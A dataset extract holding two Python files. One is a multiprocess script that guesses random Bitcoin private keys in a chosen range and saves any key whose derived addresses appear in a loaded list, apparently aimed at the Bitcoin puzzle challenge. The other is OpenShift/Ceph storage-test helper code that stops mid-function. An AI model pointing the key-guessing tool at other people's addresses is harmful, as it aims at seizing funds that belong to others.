source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
Bitcoin_randomCPU.py
|
'''
Made by Mizogg Look for Bitcoin Compressed and Uncompressed 3 bc1 Using iceland2k14 secp256k1 https://github.com/iceland2k14/secp256k1 fastest Python Libary
Good Luck and Happy Hunting Bitcoin_randomCPU.py Version 2 scan randomly in Range with CPU Speed Improvments
https://mizogg.co.uk
'''
import secp256k1 as ice
import time, multiprocessing, random
from multiprocessing import pool, Event, Process, Queue, Value, cpu_count
from time import sleep
def hunt(start, stop, h160, cores='all'):
try:
available_cores = cpu_count()
if cores == 'all':
cores = available_cores
elif 0 < int(cores) <= available_cores:
cores = int(cores)
else:
cores = 1
counter = Value('L')
match = Event()
queue = Queue()
workers = []
for r in range(cores):
p = Process(target=main, args=(counter, start, stop, add))
workers.append(p)
p.start()
for worker in workers:
worker.join()
except(KeyboardInterrupt, SystemExit):
exit('\nCTRL-C detected. Exiting gracefully. Thank you and Happy Hunting')
def main(counter, start, stop, add):
count = 0
iteration = 0
start_time = time.time()
while True:
count += 4
iteration += 1
ran=random.randrange(start,stop)
seed = str(ran)
HEX = "%064x" % ran
wifc = ice.btc_pvk_to_wif(HEX)
wifu = ice.btc_pvk_to_wif(HEX, False)
caddr = ice.privatekey_to_address(0, True, int(seed)) #Compressed
uaddr = ice.privatekey_to_address(0, False, int(seed)) #Uncompressed
P2SH = ice.privatekey_to_address(1, True, int(seed)) #p2sh
BECH32 = ice.privatekey_to_address(2, True, int(seed)) #bech32
if caddr in add or uaddr in add or P2SH in add or BECH32 in add :
print('\nMatch Found')
print('\nPrivatekey (dec): ', seed,'\nPrivatekey (hex): ', HEX, '\nPrivatekey Uncompressed: ', wifu, '\nPrivatekey compressed: ', wifc, '\nPublic Address 1 Uncompressed: ', uaddr, '\nPublic Address 1 Compressed: ', caddr, '\nPublic Address 3 P2SH: ', P2SH, '\nPublic Address bc1 BECH32: ', BECH32)
f=open("winner.txt","a")
f.write('\nPrivatekey (dec): ' + seed)
f.write('\nPrivatekey (hex): ' + HEX)
f.write('\nPrivatekey Uncompressed: ' + wifu)
f.write('\nPrivatekey compressed: ' + wifc)
f.write('\nPublic Address 1 Compressed: ' + caddr)
f.write('\nPublic Address 1 Uncompressed: ' + uaddr)
f.write('\nPublic Address 3 P2SH: ' + P2SH)
f.write('\nPublic Address bc1 BECH32: ' + BECH32)
else:
if iteration % 10000 == 0:
elapsed = time.time() - start_time
print(f'It/CPU={iteration} checked={count} Hex={HEX} Keys/Sec={iteration / elapsed:.1f}')
if __name__ == '__main__':
print('[+] Starting.........Please Wait.....Bitcoin Address List Loading.....')
filename ='puzzle.txt'
with open(filename) as f:
line_count = 0
for line in f:
line != "\n"
line_count += 1
with open(filename) as file:
add = file.read().split()
add = set(add)
print('Total Bitcoin Addresses Loaded and Checking : ',str (line_count))
howmany=int(input("Number of Cores CPU -> "))
start=int(input("start range Min 1-115792089237316195423570985008687907852837564279074904382605163141518161494335 -> "))
stop=int(input("stop range Max 115792089237316195423570985008687907852837564279074904382605163141518161494336 -> "))
print("Starting search... Please Wait min range: " + str(start))
print("Max range: " + str(stop))
print("==========================================================")
print('Total Bitcoin Addresses Loaded and Checking : ',str (line_count))
hunt(start, stop, add, cores = howmany)
|
helpers.py
|
"""
Helper functions file for OCS QE
"""
import base64
import datetime
import hashlib
import json
import logging
import os
import re
import statistics
import tempfile
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from subprocess import PIPE, TimeoutExpired, run
from uuid import uuid4
import yaml
from ocs_ci.framework import config
from ocs_ci.ocs.utils import mirror_image
from ocs_ci.ocs import constants, defaults, node, ocp
from ocs_ci.ocs.exceptions import (
CommandFailed, ResourceWrongStatusException,
TimeoutExpiredError, UnavailableBuildException,
UnexpectedBehaviour
)
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pod, pvc
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.utility import templating
from ocs_ci.utility.retry import retry
from ocs_ci.utility.utils import (
TimeoutSampler,
ocsci_log_path,
run_cmd,
update_container_with_mirrored_image,
)
logger = logging.getLogger(__name__)
def create_unique_resource_name(resource_description, resource_type):
"""
Creates a unique object name by using the object_description,
object_type and a random uuid(in hex) as suffix
Args:
resource_description (str): The user provided object description
resource_type (str): The type of object for which the unique name
will be created. For example: project, pvc, etc
Returns:
str: A unique name
"""
return f"{resource_type}-{resource_description[:23]}-{uuid4().hex}"
def create_resource(do_reload=True, **kwargs):
"""
Create a resource
Args:
do_reload (bool): True for reloading the resource following its creation,
False otherwise
kwargs (dict): Dictionary of the OCS resource
Returns:
OCS: An OCS instance
Raises:
AssertionError: In case of any failure
"""
ocs_obj = OCS(**kwargs)
resource_name = kwargs.get('metadata').get('name')
created_resource = ocs_obj.create(do_reload=do_reload)
assert created_resource, (
f"Failed to create resource {resource_name}"
)
return ocs_obj
def wait_for_resource_state(resource, state, timeout=60):
"""
Wait for a resource to get to a given status
Args:
resource (OCS obj): The resource object
state (str): The status to wait for
timeout (int): Time in seconds to wait
Raises:
ResourceWrongStatusException: In case the resource hasn't
reached the desired state
"""
if (
resource.name == constants.DEFAULT_STORAGECLASS_CEPHFS
or resource.name == constants.DEFAULT_STORAGECLASS_RBD
):
logger.info("Attempt to default default Secret or StorageClass")
return
try:
resource.ocp.wait_for_resource(
condition=state, resource_name=resource.name, timeout=timeout
)
except TimeoutExpiredError:
logger.error(f"{resource.kind} {resource.name} failed to reach {state}")
resource.reload()
raise ResourceWrongStatusException(resource.name, resource.describe())
logger.info(f"{resource.kind} {resource.name} reached state {state}")
def create_pod(
interface_type=None, pvc_name=None,
do_reload=True, namespace=defaults.ROOK_CLUSTER_NAMESPACE,
node_name=None, pod_dict_path=None, sa_name=None, dc_deployment=False,
raw_block_pv=False, raw_block_device=constants.RAW_BLOCK_DEVICE, replica_count=1,
pod_name=None, node_selector=None, command=None, command_args=None,
deploy_pod_status=constants.STATUS_COMPLETED
):
"""
Create a pod
Args:
interface_type (str): The interface type (CephFS, RBD, etc.)
pvc_name (str): The PVC that should be attached to the newly created pod
do_reload (bool): True for reloading the object after creation, False otherwise
namespace (str): The namespace for the new resource creation
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod
sa_name (str): Serviceaccount name
dc_deployment (bool): True if creating pod as deploymentconfig
raw_block_pv (bool): True for creating raw block pv based pod, False otherwise
raw_block_device (str): raw block device for the pod
replica_count (int): Replica count for deployment config
pod_name (str): Name of the pod to create
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
command (list): The command to be executed on the pod
command_args (list): The arguments to be sent to the command running
on the pod
deploy_pod_status (str): Expected status of deploy pod. Applicable
only if dc_deployment is True
Returns:
Pod: A Pod instance
Raises:
AssertionError: In case of any failure
"""
if interface_type == constants.CEPHBLOCKPOOL:
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_RBD_POD_YAML
interface = constants.RBD_INTERFACE
else:
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_CEPHFS_POD_YAML
interface = constants.CEPHFS_INTERFACE
if dc_deployment:
pod_dict = pod_dict_path if pod_dict_path else constants.FEDORA_DC_YAML
pod_data = templating.load_yaml(pod_dict)
if not pod_name:
pod_name = create_unique_resource_name(
f'test-{interface}', 'pod'
)
pod_data['metadata']['name'] = pod_name
pod_data['metadata']['namespace'] = namespace
if dc_deployment:
pod_data['metadata']['labels']['app'] = pod_name
pod_data['spec']['template']['metadata']['labels']['name'] = pod_name
pod_data['spec']['replicas'] = replica_count
if pvc_name:
if dc_deployment:
pod_data['spec']['template']['spec']['volumes'][0][
'persistentVolumeClaim'
]['claimName'] = pvc_name
else:
pod_data['spec']['volumes'][0]['persistentVolumeClaim']['claimName'] = pvc_name
if interface_type == constants.CEPHBLOCKPOOL and raw_block_pv:
if pod_dict_path in [constants.FEDORA_DC_YAML, constants.FIO_DC_YAML]:
temp_dict = [
{'devicePath': raw_block_device, 'name': pod_data.get('spec').get(
'template').get('spec').get('volumes')[0].get('name')}
]
if pod_dict_path == constants.FEDORA_DC_YAML:
del pod_data['spec']['template']['spec']['containers'][0]['volumeMounts']
security_context = {'capabilities': {'add': ["SYS_ADMIN"]}}
pod_data['spec']['template']['spec']['containers'][0]['securityContext'] = security_context
pod_data['spec']['template']['spec']['containers'][0]['volumeDevices'] = temp_dict
elif pod_dict_path == constants.NGINX_POD_YAML:
temp_dict = [
{'devicePath': raw_block_device, 'name': pod_data.get('spec').get(
'containers')[0].get('volumeMounts')[0].get('name')}
]
del pod_data['spec']['containers'][0]['volumeMounts']
pod_data['spec']['containers'][0]['volumeDevices'] = temp_dict
else:
pod_data['spec']['containers'][0]['volumeDevices'][0]['devicePath'] = raw_block_device
pod_data['spec']['containers'][0]['volumeDevices'][0]['name'] = pod_data.get('spec').get('volumes')[
0].get('name')
if command:
if dc_deployment:
pod_data['spec']['template']['spec']['containers'][0]['command'] = command
else:
pod_data['spec']['containers'][0]['command'] = command
if command_args:
if dc_deployment:
pod_data['spec']['template']['spec']['containers'][0]['args'] = command_args
else:
pod_data['spec']['containers'][0]['args'] = command_args
if node_name:
if dc_deployment:
pod_data['spec']['template']['spec']['nodeName'] = node_name
else:
pod_data['spec']['nodeName'] = node_name
if node_selector:
if dc_deployment:
pod_data['spec']['template']['spec']['nodeSelector'] = node_selector
else:
pod_data['spec']['nodeSelector'] = node_selector
if sa_name and dc_deployment:
pod_data['spec']['template']['spec']['serviceAccountName'] = sa_name
# overwrite used image (required for disconnected installation)
update_container_with_mirrored_image(pod_data)
# configure http[s]_proxy env variable, if required
try:
http_proxy, https_proxy, no_proxy = get_cluster_proxies()
if http_proxy:
if 'containers' in pod_data['spec']:
container = pod_data['spec']['containers'][0]
else:
container = pod_data['spec']['template']['spec']['containers'][0]
if 'env' not in container:
container['env'] = []
container['env'].append({
'name': 'http_proxy',
'value': http_proxy,
})
container['env'].append({
'name': 'https_proxy',
'value': https_proxy,
})
container['env'].append({
'name': 'no_proxy',
'value': no_proxy,
})
except KeyError as err:
logging.warning(
"Http(s)_proxy variable wasn't configured, "
"'%s' key not found.", err
)
if dc_deployment:
ocs_obj = create_resource(**pod_data)
logger.info(ocs_obj.name)
assert (ocp.OCP(kind='pod', namespace=namespace)).wait_for_resource(
condition=deploy_pod_status,
resource_name=pod_name + '-1-deploy',
resource_count=0, timeout=360, sleep=3
)
dpod_list = pod.get_all_pods(namespace=namespace)
for dpod in dpod_list:
if '-1-deploy' not in dpod.name:
if pod_name in dpod.name:
return dpod
else:
pod_obj = pod.Pod(**pod_data)
pod_name = pod_data.get('metadata').get('name')
logger.info(f'Creating new Pod {pod_name} for test')
created_resource = pod_obj.create(do_reload=do_reload)
assert created_resource, (
f"Failed to create Pod {pod_name}"
)
return pod_obj
def create_project(project_name=None):
"""
Create a project
Args:
project_name (str): The name for the new project
Returns:
OCP: Project object
"""
namespace = project_name or create_unique_resource_name('test', 'namespace')
project_obj = ocp.OCP(kind='Project', namespace=namespace)
assert project_obj.new_project(namespace), f"Failed to create namespace {namespace}"
return project_obj
def create_multilpe_projects(number_of_project):
"""
Create one or more projects
Args:
number_of_project (int): Number of projects to be created
Returns:
list: List of project objects
"""
project_objs = [create_project() for _ in range(number_of_project)]
return project_objs
def create_secret(interface_type):
"""
Create a secret
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: An OCS instance for the secret
"""
secret_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
secret_data = templating.load_yaml(
constants.CSI_RBD_SECRET_YAML
)
secret_data['stringData']['userID'] = constants.ADMIN_USER
secret_data['stringData']['userKey'] = get_admin_key()
interface = constants.RBD_INTERFACE
elif interface_type == constants.CEPHFILESYSTEM:
secret_data = templating.load_yaml(
constants.CSI_CEPHFS_SECRET_YAML
)
del secret_data['stringData']['userID']
del secret_data['stringData']['userKey']
secret_data['stringData']['adminID'] = constants.ADMIN_USER
secret_data['stringData']['adminKey'] = get_admin_key()
interface = constants.CEPHFS_INTERFACE
secret_data['metadata']['name'] = create_unique_resource_name(
f'test-{interface}', 'secret'
)
secret_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
return create_resource(**secret_data)
def default_ceph_block_pool():
"""
Returns default CephBlockPool
Returns:
default CephBlockPool
"""
sc_obj = default_storage_class(constants.CEPHBLOCKPOOL)
cbp_name = sc_obj.get().get('parameters').get('pool')
return cbp_name if cbp_name else constants.DEFAULT_BLOCKPOOL
def create_ceph_block_pool(pool_name=None, failure_domain=None, verify=True):
"""
Create a Ceph block pool
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
failure_domain (str): Failure domain name
verify (bool): True to verify the pool exists after creation,
False otherwise
Returns:
OCS: An OCS instance for the Ceph block pool
"""
cbp_data = templating.load_yaml(constants.CEPHBLOCKPOOL_YAML)
cbp_data['metadata']['name'] = (
pool_name if pool_name else create_unique_resource_name(
'test', 'cbp'
)
)
cbp_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
cbp_data['spec']['failureDomain'] = failure_domain or get_failure_domin()
cbp_obj = create_resource(**cbp_data)
cbp_obj.reload()
if verify:
assert verify_block_pool_exists(cbp_obj.name), (
f"Block pool {cbp_obj.name} does not exist"
)
return cbp_obj
def create_ceph_file_system(pool_name=None):
"""
Create a Ceph file system
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
Returns:
OCS: An OCS instance for the Ceph file system
"""
cfs_data = templating.load_yaml(constants.CEPHFILESYSTEM_YAML)
cfs_data['metadata']['name'] = (
pool_name if pool_name else create_unique_resource_name(
'test', 'cfs'
)
)
cfs_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
cfs_data = create_resource(**cfs_data)
cfs_data.reload()
assert validate_cephfilesystem(cfs_data.name), (
f"File system {cfs_data.name} does not exist"
)
return cfs_data
def default_storage_class(
interface_type,
):
"""
Return default storage class based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: Existing StorageClass Instance
"""
external = config.DEPLOYMENT['external_mode']
if interface_type == constants.CEPHBLOCKPOOL:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD
else:
resource_name = constants.DEFAULT_STORAGECLASS_RBD
base_sc = OCP(
kind='storageclass',
resource_name=resource_name
)
elif interface_type == constants.CEPHFILESYSTEM:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_CEPHFS
else:
resource_name = constants.DEFAULT_STORAGECLASS_CEPHFS
base_sc = OCP(
kind='storageclass',
resource_name=resource_name
)
sc = OCS(**base_sc.data)
return sc
def create_storage_class(
interface_type, interface_name, secret_name,
reclaim_policy=constants.RECLAIM_POLICY_DELETE, sc_name=None,
provisioner=None
):
"""
Create a storage class
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
interface_name (str): The name of the interface
secret_name (str): The name of the secret
sc_name (str): The name of storage class to create
reclaim_policy (str): Type of reclaim policy. Defaults to 'Delete'
(eg., 'Delete', 'Retain')
Returns:
OCS: An OCS instance for the storage class
"""
sc_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
sc_data = templating.load_yaml(
constants.CSI_RBD_STORAGECLASS_YAML
)
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-name'
] = secret_name
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-namespace'
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.RBD_INTERFACE
sc_data['provisioner'] = (
provisioner if provisioner else defaults.RBD_PROVISIONER
)
elif interface_type == constants.CEPHFILESYSTEM:
sc_data = templating.load_yaml(
constants.CSI_CEPHFS_STORAGECLASS_YAML
)
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-name'
] = secret_name
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-namespace'
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.CEPHFS_INTERFACE
sc_data['parameters']['fsName'] = get_cephfs_name()
sc_data['provisioner'] = (
provisioner if provisioner else defaults.CEPHFS_PROVISIONER
)
sc_data['parameters']['pool'] = interface_name
sc_data['metadata']['name'] = (
sc_name if sc_name else create_unique_resource_name(
f'test-{interface}', 'storageclass'
)
)
sc_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data['parameters'][
'csi.storage.k8s.io/provisioner-secret-name'
] = secret_name
sc_data['parameters'][
'csi.storage.k8s.io/provisioner-secret-namespace'
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data['parameters'][
'csi.storage.k8s.io/controller-expand-secret-name'
] = secret_name
sc_data['parameters'][
'csi.storage.k8s.io/controller-expand-secret-namespace'
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data['parameters']['clusterID'] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data['reclaimPolicy'] = reclaim_policy
try:
del sc_data['parameters']['userid']
except KeyError:
pass
return create_resource(**sc_data)
def create_pvc(
sc_name, pvc_name=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE,
size=None, do_reload=True, access_mode=constants.ACCESS_MODE_RWO,
volume_mode=None
):
"""
Create a PVC
Args:
sc_name (str): The name of the storage class for the PVC to be
associated with
pvc_name (str): The name of the PVC to create
namespace (str): The namespace for the PVC creation
size (str): Size of pvc to create
do_reload (bool): True for wait for reloading PVC after its creation, False otherwise
access_mode (str): The access mode to be used for the PVC
volume_mode (str): Volume mode for rbd RWX pvc i.e. 'Block'
Returns:
PVC: PVC instance
"""
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data['metadata']['name'] = (
pvc_name if pvc_name else create_unique_resource_name(
'test', 'pvc'
)
)
pvc_data['metadata']['namespace'] = namespace
pvc_data['spec']['accessModes'] = [access_mode]
pvc_data['spec']['storageClassName'] = sc_name
if size:
pvc_data['spec']['resources']['requests']['storage'] = size
if volume_mode:
pvc_data['spec']['volumeMode'] = volume_mode
ocs_obj = pvc.PVC(**pvc_data)
created_pvc = ocs_obj.create(do_reload=do_reload)
assert created_pvc, f"Failed to create resource {pvc_name}"
return ocs_obj
def create_multiple_pvcs(
sc_name, namespace, number_of_pvc=1, size=None, do_reload=False,
access_mode=constants.ACCESS_MODE_RWO, burst=False
):
"""
Create one or more PVC as a bulk or one by one
Args:
sc_name (str): The name of the storage class to provision the PVCs from
namespace (str): The namespace for the PVCs creation
number_of_pvc (int): Number of PVCs to be created
size (str): The size of the PVCs to create
do_reload (bool): True for wait for reloading PVC after its creation,
False otherwise
access_mode (str): The kind of access mode for PVC
Returns:
list: List of PVC objects
"""
if not burst:
if access_mode == 'ReadWriteMany' and 'rbd' in sc_name:
volume_mode = 'Block'
else:
volume_mode = None
return [
create_pvc(
sc_name=sc_name, size=size, namespace=namespace,
do_reload=do_reload, access_mode=access_mode, volume_mode=volume_mode
) for _ in range(number_of_pvc)
]
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data['metadata']['namespace'] = namespace
pvc_data['spec']['accessModes'] = [access_mode]
pvc_data['spec']['storageClassName'] = sc_name
if size:
pvc_data['spec']['resources']['requests']['storage'] = size
if access_mode == 'ReadWriteMany' and 'rbd' in sc_name:
pvc_data['spec']['volumeMode'] = 'Block'
else:
pvc_data['spec']['volumeMode'] = None
# Creating tem directory to hold the files for the PVC creation
tmpdir = tempfile.mkdtemp()
logger.info('Creating the PVC yaml files for creation in bulk')
ocs_objs = []
for _ in range(number_of_pvc):
name = create_unique_resource_name('test', 'pvc')
logger.info(f"Adding PVC with name {name}")
pvc_data['metadata']['name'] = name
templating.dump_data_to_temp_yaml(pvc_data, f'{tmpdir}/{name}.yaml')
ocs_objs.append(pvc.PVC(**pvc_data))
logger.info('Creating all PVCs as bulk')
oc = OCP(kind='pod', namespace=defaults.ROOK_CLUSTER_NAMESPACE)
cmd = f"create -f {tmpdir}/"
oc.exec_oc_cmd(command=cmd, out_yaml_format=False)
# Letting the system 1 sec for each PVC to create.
# this will prevent any other command from running in the system in this
# period of time.
logger.info(
f"Going to sleep for {number_of_pvc} sec. "
"until starting verify that PVCs was created.")
time.sleep(number_of_pvc)
return ocs_objs
def verify_block_pool_exists(pool_name):
"""
Verify if a Ceph block pool exist
Args:
pool_name (str): The name of the Ceph block pool
Returns:
bool: True if the Ceph block pool exists, False otherwise
"""
logger.info(f"Verifying that block pool {pool_name} exists")
ct_pod = pod.get_ceph_tools_pod()
try:
for pools in TimeoutSampler(
60, 3, ct_pod.exec_ceph_cmd, 'ceph osd lspools'
):
logger.info(f'POOLS are {pools}')
for pool in pools:
if pool_name in pool.get('poolname'):
return True
except TimeoutExpiredError:
return False
def get_admin_key():
"""
Fetches admin key secret from Ceph
Returns:
str: The admin key
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd('ceph auth get-key client.admin')
return out['key']
def get_cephfs_data_pool_name():
"""
Fetches ceph fs datapool name from Ceph
Returns:
str: fs datapool name
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd('ceph fs ls')
return out[0]['data_pools'][0]
def validate_cephfilesystem(fs_name):
"""
Verify CephFileSystem exists at Ceph and OCP
Args:
fs_name (str): The name of the Ceph FileSystem
Returns:
bool: True if CephFileSystem is created at Ceph and OCP side else
will return False with valid msg i.e Failure cause
"""
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
ct_pod = pod.get_ceph_tools_pod()
ceph_validate = False
ocp_validate = False
result = cfs.get(resource_name=fs_name)
if result.get('metadata').get('name'):
logger.info("Filesystem %s got created from Openshift Side", fs_name)
ocp_validate = True
else:
logger.info(
"Filesystem %s was not create at Openshift Side", fs_name
)
return False
try:
for pools in TimeoutSampler(
60, 3, ct_pod.exec_ceph_cmd, 'ceph fs ls'
):
for out in pools:
result = out.get('name')
if result == fs_name:
logger.info("FileSystem %s got created from Ceph Side", fs_name)
ceph_validate = True
break
else:
logger.error("FileSystem %s was not present at Ceph Side", fs_name)
ceph_validate = False
if ceph_validate:
break
except TimeoutExpiredError:
pass
return True if (ceph_validate and ocp_validate) else False
def get_all_storageclass_names():
"""
Function for getting all storageclass
Returns:
list: list of storageclass name
"""
sc_obj = ocp.OCP(
kind=constants.STORAGECLASS,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = sc_obj.get()
sample = result['items']
storageclass = [
item.get('metadata').get('name') for item in sample if (
(item.get('metadata').get('name') not in constants.IGNORE_SC_GP2)
and (item.get('metadata').get('name') not in constants.IGNORE_SC_FLEX)
)
]
return storageclass
def delete_storageclasses(sc_objs):
""""
Function for Deleting storageclasses
Args:
sc_objs (list): List of SC objects for deletion
Returns:
bool: True if deletion is successful
"""
for sc in sc_objs:
logger.info("Deleting StorageClass with name %s", sc.name)
sc.delete()
return True
def get_cephblockpool_names():
"""
Function for getting all CephBlockPool
Returns:
list: list of cephblockpool name
"""
pool_obj = ocp.OCP(
kind=constants.CEPHBLOCKPOOL,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = pool_obj.get()
sample = result['items']
pool_list = [
item.get('metadata').get('name') for item in sample
]
return pool_list
def delete_cephblockpools(cbp_objs):
"""
Function for deleting CephBlockPool
Args:
cbp_objs (list): List of CBP objects for deletion
Returns:
bool: True if deletion of CephBlockPool is successful
"""
for cbp in cbp_objs:
logger.info("Deleting CephBlockPool with name %s", cbp.name)
cbp.delete()
return True
def get_cephfs_name():
"""
Function to retrive CephFS name
Returns:
str: Name of CFS
"""
ct_pod = pod.get_ceph_tools_pod()
result = ct_pod.exec_ceph_cmd('ceph fs ls')
return result[0]['name']
def pull_images(image_name):
"""
Function to pull images on all nodes
Args:
image_name (str): Name of the container image to be pulled
Returns: None
"""
node_objs = node.get_node_objs(get_worker_nodes())
for node_obj in node_objs:
logging.info(f'pulling image "{image_name} " on node {node_obj.name}')
assert node_obj.ocp.exec_oc_debug_cmd(
node_obj.name, cmd_list=[f'podman pull {image_name}']
)
def run_io_with_rados_bench(**kw):
""" A task for radosbench
Runs radosbench command on specified pod . If parameters are
not provided task assumes few default parameters.This task
runs command in synchronous fashion.
Args:
**kw: Needs a dictionary of various radosbench parameters.
ex: pool_name:pool
pg_num:number of pgs for pool
op: type of operation {read, write}
cleanup: True OR False
Returns:
ret: return value of radosbench command
"""
logger.info("Running radosbench task")
ceph_pods = kw.get('ceph_pods') # list of pod objects of ceph cluster
config = kw.get('config')
role = config.get('role', 'client')
clients = [cpod for cpod in ceph_pods if role in cpod.roles]
idx = config.get('idx', 0)
client = clients[idx]
op = config.get('op', 'write')
cleanup = ['--no-cleanup', '--cleanup'][config.get('cleanup', True)]
pool = config.get('pool')
block = str(config.get('size', 4 << 20))
time = config.get('time', 120)
time = str(time)
rados_bench = (
f"rados --no-log-to-stderr "
f"-b {block} "
f"-p {pool} "
f"bench "
f"{time} "
f"{op} "
f"{cleanup} "
)
try:
ret = client.exec_ceph_cmd(ceph_cmd=rados_bench)
except CommandFailed as ex:
logger.error(f"Rados bench failed\n Error is: {ex}")
return False
logger.info(ret)
logger.info("Finished radosbench")
return ret
def get_all_pvs():
"""
Gets all pv in openshift-storage namespace
Returns:
dict: Dict of all pv in openshift-storage namespace
"""
ocp_pv_obj = ocp.OCP(
kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
return ocp_pv_obj.get()
# TODO: revert counts of tries and delay,BZ 1726266
@retry(AssertionError, tries=20, delay=10, backoff=1)
def validate_pv_delete(pv_name):
"""
validates if pv is deleted after pvc deletion
Args:
pv_name (str): pv from pvc to validates
Returns:
bool: True if deletion is successful
Raises:
AssertionError: If pv is not deleted
"""
ocp_pv_obj = ocp.OCP(
kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
try:
if ocp_pv_obj.get(resource_name=pv_name):
msg = f"{constants.PV} {pv_name} is not deleted after PVC deletion"
raise AssertionError(msg)
except CommandFailed:
return True
def create_pods(pvc_objs, pod_factory, interface, pods_for_rwx=1, status=""):
"""
Create pods
Args:
pvc_objs (list): List of ocs_ci.ocs.resources.pvc.PVC instances
pod_factory (function): pod_factory function
interface (int): Interface type
pods_for_rwx (int): Number of pods to be created if access mode of
PVC is RWX
status (str): If provided, wait for desired state of each pod before
creating next one
Returns:
list: list of Pod objects
"""
pod_objs = []
for pvc_obj in pvc_objs:
volume_mode = getattr(
pvc_obj, 'volume_mode', pvc_obj.get()['spec']['volumeMode']
)
access_mode = getattr(
pvc_obj, 'access_mode', pvc_obj.get_pvc_access_mode
)
if volume_mode == 'Block':
pod_dict = constants.CSI_RBD_RAW_BLOCK_POD_YAML
raw_block_pv = True
else:
raw_block_pv = False
pod_dict = ''
if access_mode == constants.ACCESS_MODE_RWX:
pod_obj_rwx = [pod_factory(
interface=interface, pvc=pvc_obj, status=status,
pod_dict_path=pod_dict, raw_block_pv=raw_block_pv
) for _ in range(1, pods_for_rwx)]
pod_objs.extend(pod_obj_rwx)
pod_obj = pod_factory(
interface=interface, pvc=pvc_obj, status=status,
pod_dict_path=pod_dict, raw_block_pv=raw_block_pv
)
pod_objs.append(pod_obj)
return pod_objs
def create_build_from_docker_image(
image_name,
install_package,
namespace,
source_image='centos',
source_image_label='latest'
):
"""
Allows to create a build config using a Dockerfile specified as an argument
For eg., oc new-build -D $'FROM centos:7\nRUN yum install -y httpd',
creates a build with 'httpd' installed
Args:
image_name (str): Name of the image to be created
source_image (str): Source image to build docker image from,
Defaults to Centos as base image
namespace (str): project where build config should be created
source_image_label (str): Tag to use along with the image name,
Defaults to 'latest'
install_package (str): package to install over the base image
Returns:
OCP (obj): Returns the OCP object for the image
Fails on UnavailableBuildException exception if build creation
fails
"""
base_image = source_image + ':' + source_image_label
if config.DEPLOYMENT.get('disconnected'):
base_image = mirror_image(image=base_image)
cmd = f'yum install -y {install_package}'
http_proxy, https_proxy, no_proxy = get_cluster_proxies()
if http_proxy:
cmd = (
f"http_proxy={http_proxy} https_proxy={https_proxy} "
f"no_proxy='{no_proxy}' {cmd}"
)
docker_file = (
f"FROM {base_image}\n "
f" RUN {cmd}\n"
f"CMD tail -f /dev/null"
)
command = f"new-build -D $\'{docker_file}\' --name={image_name}"
kubeconfig = os.getenv('KUBECONFIG')
oc_cmd = f"oc -n {namespace} "
if kubeconfig:
oc_cmd += f"--kubeconfig {kubeconfig} "
oc_cmd += command
logger.info(f'Running command {oc_cmd}')
result = run(
oc_cmd,
stdout=PIPE,
stderr=PIPE,
timeout=15,
shell=True
)
if result.stderr.decode():
raise UnavailableBuildException(
f'Build creation failed with error: {result.stderr.decode()}'
)
out = result.stdout.decode()
logger.info(out)
if 'Success' in out:
# Build becomes ready once build pod goes into Completed state
pod_obj = OCP(kind='Pod', resource_name=image_name)
if pod_obj.wait_for_resource(
condition='Completed',
resource_name=f'{image_name}' + '-1-build',
timeout=300,
sleep=30
):
logger.info(f'build {image_name} ready')
set_image_lookup(image_name)
logger.info(f'image {image_name} can now be consumed')
image_stream_obj = OCP(
kind='ImageStream', resource_name=image_name
)
return image_stream_obj
else:
raise UnavailableBuildException('Build creation failed')
def set_image_lookup(image_name):
"""
Function to enable lookup, which allows reference to the image stream tag
in the image field of the object. Example,
$ oc set image-lookup mysql
$ oc run mysql --image=mysql
Args:
image_name (str): Name of the image stream to pull
the image locally
Returns:
str: output of set image-lookup command
"""
ocp_obj = ocp.OCP(kind='ImageStream')
command = f'set image-lookup {image_name}'
logger.info(f'image lookup for image"{image_name}" is set')
